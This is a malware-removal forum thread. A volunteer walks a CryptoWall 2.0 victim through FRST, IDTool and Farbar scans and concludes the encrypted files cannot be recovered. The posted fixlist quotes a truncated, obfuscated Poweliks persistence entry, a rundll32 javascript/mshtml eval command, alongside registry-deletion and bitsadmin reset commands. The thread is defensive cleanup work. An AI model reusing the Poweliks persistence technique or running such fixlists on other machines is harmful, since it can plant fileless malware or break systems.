cryptowall 2.0

At this point I’ve lost where I am in the steps. Managed to do the malware download and save .txt Have started the Farber … and get blue screen, windows shuts down… three times now. Attaching what I have. Can’t even print to save instructions except for the stupid Decrypt Instruct that show automatically every time the computer restarts.

I’m afraid to report, you’re pretty much screwed. While we can remove the actual infection, we cannot remove the encryption Your best bet is any backups you may or may not have.

I will notify a remover to see he they can still assist you without FRST, which almost surely they can.

Also, your MBAM log is far from complete. It’s got the heading and that’s it.

Are you able to get into safe mode ? If so try FRST from there

If not I will post other instructions shortly

Sending some results…FRST and a screen shot of malwarebytes (if that helps)

Could you attach the main FRST.txt please I now have 2 additions :slight_smile:

https://sites.google.com/site/cannedfixes/home/hosted-images-tools/IDToolbyNathan.png
Scan with IDTool

Please download IDTool by Nathan and save the file to the desktop.
It will come as a zipped file, so you will need to unzip it. You may do it by right-clicking on it and choosing Extract All. Extract it to your desktop.

[*]Enter the IDTool directory, right-click on
https://sites.google.com/site/cannedfixes/home/hosted-images-tools/IDToolbyNathan.png
icon and select
https://sites.google.com/site/cannedfixes/home/hosted-images-tools/RunAsAdmin.jpg
Run as Administrator to start the tool.
[*]IDTool needs Microsoft .NET Framework environment to work properly, so if prompted to download & install it please agree
[*]Wait patiently until the tool will collect necessary data.
[*]Once the main console is loaded, please press Rescan Computer and Generate a New Report
[*]When prompted at the main bar that Rescan is completed, press Generate Text Friendly Report for Forums.
[*]Copy the entire content of the frame that appears. You may want to save it to a text file for your convenience

Please include that contents in your next reply.

I keep getting booted off…Try again

Do you have any backups that you can use to recover your documents etc… ?

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

HKU\S-1-5-21-2109097572-556501836-756160637-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! SearchScopes: HKCU - {F678A9CB-BE53-4D91-83D2-C3D9FC879CB0} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3291325&CUI=UN11544018101162016&UM=2 BHO: No Name -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> No File BHO-x32: No Name -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> No File Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File 2014-11-11 12:07 - 2014-11-11 12:07 - 00008512 _____ () C:\Users\E Diane Champé\Downloads\DECRYPT_INSTRUCTION.HTML 2014-11-11 12:07 - 2014-11-11 12:07 - 00008512 _____ () C:\Users\E Diane Champé\Documents\DECRYPT_INSTRUCTION.HTML 2014-11-11 12:07 - 2014-11-11 12:07 - 00008512 _____ () C:\Users\E Diane Champé\DECRYPT_INSTRUCTION.HTML 2014-11-11 12:07 - 2014-11-11 12:07 - 00004196 _____ () C:\Users\E Diane Champé\Downloads\DECRYPT_INSTRUCTION.TXT 2014-11-11 12:07 - 2014-11-11 12:07 - 00004196 _____ () C:\Users\E Diane Champé\Documents\DECRYPT_INSTRUCTION.TXT 2014-11-11 12:07 - 2014-11-11 12:07 - 00004196 _____ () C:\Users\E Diane Champé\DECRYPT_INSTRUCTION.TXT 2014-11-11 12:04 - 2014-11-11 12:04 - 00008512 _____ () C:\Users\E Diane Champé\AppData\Roaming\DECRYPT_INSTRUCTION.HTML 2014-11-11 12:04 - 2014-11-11 12:04 - 00008512 _____ () C:\Users\E Diane Champé\AppData\Local\DECRYPT_INSTRUCTION.HTML 2014-11-11 12:04 - 2014-11-11 12:04 - 00008512 _____ () C:\Users\E Diane Champé\AppData\DECRYPT_INSTRUCTION.HTML 2014-11-11 12:04 - 2014-11-11 12:04 - 00008512 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML 2014-11-11 12:04 - 2014-11-11 12:04 - 00004196 _____ () C:\Users\E Diane Champé\AppData\Roaming\DECRYPT_INSTRUCTION.TXT 2014-11-11 12:04 - 2014-11-11 12:04 - 00004196 _____ () C:\Users\E Diane Champé\AppData\Local\DECRYPT_INSTRUCTION.TXT 2014-11-11 12:04 - 2014-11-11 12:04 - 00004196 _____ () C:\Users\E Diane Champé\AppData\DECRYPT_INSTRUCTION.TXT 2014-11-11 12:04 - 2014-11-11 12:04 - 00004196 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT 2014-11-10 16:25 - 2014-11-10 16:25 - 00041925 ____H () C:\Users\E Diane Champé\Documents\~WRL3478.tmp 2014-11-09 17:15 - 2014-11-11 12:03 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-10-22 15:34 - 2014-11-17 12:21 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8} CustomCLSID: HKU\S-1-5-21-2109097572-556501836-756160637-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? CustomCLSID: HKU\S-1-5-21-2109097572-556501836-756160637-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\wdigest.dll No File Reg: reg delete "HKCU\Software\7BE9D9A379551CE69739F1D99A3FAE67\1336779999AADEFF" EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe
Run FRST and press Fix
On completion a log will be generated please post that

THEN

Download and run farbar service scanner

https://dl.dropboxusercontent.com/u/73555776/fssscan.JPG

Tick “All” options.
Press “Scan”.
It will create a log (FSS.txt) in the same directory the tool is run.

Please copy and paste the log to your reply.

I’m hoping the weird things (I have to fill in the verification code 4+ times and then re-log into the forum, sometimes restart the browser) are related to the cryptowall??? Am trying to run the farber service scanner.

Now you have posted 3 times the captcha is history

I can’t download the farber service security…actually I downloaded it in safezone, but I can’t open it. Message that I don’t have required privilege appears. I’m the only user/administrator on this computer. Any suggestions?

Right Click > Run as Admin. Does that work?

No

You will not be able to run it from safezone you will need to download it to your desktop and run from there

Was able to download on another computer and then run it. Here’s the log
##########################
Farbar Service Scanner Version: 21-07-2014
Ran by E Diane Champé (administrator) on 17-11-2014 at 16:46:58
Running from "I:"
Microsoft Windows 7 Home Premium Service Pack 1 (X64)
Boot Mode: Normal


Internet Services:

Connection Status:

Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.

Windows Firewall:

Firewall Disabled Policy:

System Restore:

System Restore Disabled Policy:

Action Center:

Windows Update:

Windows Autoupdate Disabled Policy:

Windows Defender:

Other Services:

File Check:

C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed

**** End of log ****

How is the computer behaving at the moment ?

Can’t see a difference. My documents are still garbled. Is that permanent? attaching an example. What should I look for?

That is there to stay until deleted. Your infection encrypted all your documents, and there is no way to decrypt them

Ran malwarebytes and zero threats found, but when I run the IDtool it says one threat still exists. I must say, the speed has returned (yah) and my back up will recover most docs. Do I simply delete all the encrypted docs ( we’re talking many GBs) and then empty trash bin? What’s the correct way to proceed?

Yes as they will be scattered around the system and my tools will not find them all

Apart from the encrypted documents are you experiencing any other problems